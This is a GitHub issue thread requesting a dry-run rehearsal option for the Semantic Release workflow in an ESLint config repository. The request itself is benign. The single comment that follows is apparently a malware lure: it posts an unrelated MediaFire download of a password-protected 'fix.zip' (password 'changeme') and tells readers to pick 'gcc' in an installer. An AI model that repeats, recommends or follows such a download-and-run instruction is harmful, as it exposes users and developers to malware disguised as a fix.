### ISSUE TITLE
Implement release workflow rehearsal functionality

### ISSUE THREAD

**Issue by wakamsha** [moneyforward/eslint-config-moneyforward#321]
## Feature Request Summary

Allow rehearsing the release workflow on this repo with GitHub Actions.

## Problem of Background

Semantic Release CLI can be run with the [`--dry-run` option](https://semantic-release.gitbook.io/semantic-release/usage/configuration#dryrun) to preview pending releases. Currently, developers must do this on their own local machines, which requires secrets such as GITHUB_TOKEN, and is a lot of work.

## Proposed Solution

Add a dry-run option to release workflows currently implemented as GitHub Actions. This will allow developers to walk through their release workflows from within the GitHub GUI.

<img width="428" alt="スクリーンショット_2024-08-29_12_31_24" src="https://github.com/user-attachments/assets/6c690a14-3a9b-4408-83b3-27c2b926a569">

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
